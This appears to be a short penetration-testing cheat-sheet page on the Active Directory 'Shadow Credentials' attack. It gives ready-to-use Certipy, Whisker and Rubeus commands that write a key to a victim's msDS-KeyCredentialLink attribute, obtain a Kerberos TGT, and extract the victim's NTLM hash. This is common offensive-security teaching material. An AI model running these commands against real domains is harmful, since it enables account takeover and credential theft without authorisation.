Shadow Credentials

Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - SpecterOpsSpecterOps

Shadow Credentials is an attack that is possible when the attacker has privileges to edit the msDS-KeyCredentialLink attribute of a target user. These permissions would allow the attacker to inject a public key into the msDS-KeyCredentialLink attribute and use the corresponding private key to authenticate to the target account.

If interested, a deeper dive can be found in the original blog post/research from SpecterOps above!

Exploit

Scenario

We control UserA, who has GenericWrite permissions to UserB.

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuseGitHub

Linux

## Generates keys, adds Shadow Credential, authenticates using the private key to
## get TGT, and does a UnPAC the hash attack to get the NTLM hash for UserB
certipy shadow \
    -u '[email protected]' -p 'password' \
    -dc-ip [DC IP] -account 'UserB' \
    auto

GitHub - eladshamir/Whisker: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.GitHub

Windows

## Generate and add a Shadow Credential to UserB
Whisker.exe add /target:'UserB' /domain:[domain] /dc:[DC FQDN]

## Authenticate as UserB using the private key to get TGT
Rubeus.exe asktgt /user:'UserB' /certificate:[base64 certificate] /domain:[domain] /dc:[DC FQDN]

PreviousAbusing ACLs NextCredential Hunting

Last updated 12 days ago

hashtagExploit

hashtagScenario

Exploit

Scenario